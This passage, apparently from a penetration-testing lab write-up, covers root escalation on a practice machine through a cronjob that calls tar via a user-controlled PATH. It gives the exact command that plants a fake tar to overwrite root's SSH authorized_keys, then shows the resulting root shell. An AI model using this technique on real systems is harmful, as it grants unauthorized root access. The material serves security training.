Misconfigured Cronjob


The root cronjob process is executing a Bash script that prepends the /home/alfredo/restapi directory to the PATH variable and performs an archiving operation using tar without its absolute path. Given that the /home/alfredo/restapi directory is controlled by the current user, alfredo, and that the tar executable is called without its absolute path, code execution as root is achievable by placing a malicious tar executable into the /home/alfredo/restapi directory.

[alfredo@fedora ~]$ echo 'cp /home/alfredo/.ssh/authorized_keys /root/.ssh/authorized_keys' > /home/alfredo/restapi/tar ; chmod 777 /home/alfredo/restapi/tar

The command above creates a tar "executable" that overwrites the SSH authorized_keys file of the root account with alfredo's authorized_keys, so alfredo's private key then grants SSH access as root.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/amaterasu]
└─$ ssh root@$IP -p 25022 -i ./id_rsa.alfredo
Web console: https://fedora:9090/
 
Last login: Tue Mar 28 03:21:22 2023
[root@fedora ~]# whoami
root
[root@fedora ~]# hostname
fedora
[root@fedora ~]# ifconfig
ens32: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.120.249  netmask 255.255.255.0  broadcast 192.168.120.255
        inet6 fe80::c03e:6487:9234:9f8b  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:9e:08:27  txqueuelen 1000  (Ethernet)
        RX packets 8413  bytes 4544887 (4.3 MiB)
        RX errors 0  dropped 100  overruns 0  frame 0
        TX packets 4314  bytes 646275 (631.1 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 20  bytes 1120 (1.0 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 20  bytes 1120 (1.0 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System level compromise